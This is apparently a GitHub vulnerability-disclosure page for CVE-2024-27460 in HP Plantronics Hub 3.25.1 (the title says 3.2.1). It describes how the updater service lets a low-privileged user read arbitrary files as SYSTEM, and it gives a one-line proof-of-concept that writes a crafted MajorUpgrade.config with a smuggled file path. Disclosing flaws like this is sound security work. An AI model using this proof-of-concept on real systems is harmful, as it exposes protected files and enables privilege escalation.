Skip to content
/ CVE-2024-27460 Public

HP Plantronics Hub 3.2.1 Updater Privilege Escalation

3 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Alaatk/CVE-2024-27460

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits

README.md

README.md

 
 

Repository files navigation

CVE-2024-27460

HP Plantronics Hub 3.25.1 Updater Privilege Escalation/Arbitrary File Read

Description:

HP Plantronics Hub 3.25.1 suffers from a bug that allows low privileged users to perform arbitrary file read as SYSTEM on the machine where the application is installed. Moreover, it is possible to abuse this flaw to escalate privileges to the SYSTEM user.

Affected versions

HP Plantronics Hub 3.25.1

Impacted service(s)

Insecure Path: "C:\ProgramData\Plantronics\Spokes3G"

Service: PlantronicsUpdateService

Steps to reproduce (POC):

  • Open cmd.exe
  • Navigate using cd C:\ProgramData\Plantronics\Spokes3G
  • echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
  • Desired file will be copied into "C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp", which any authenticated user has access to.

Discovered by:

  • Farid Zerrouk of Deloitte Belgium
  • Alaa Kachouh of Mastercard Europe

About

HP Plantronics Hub 3.2.1 Updater Privilege Escalation

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published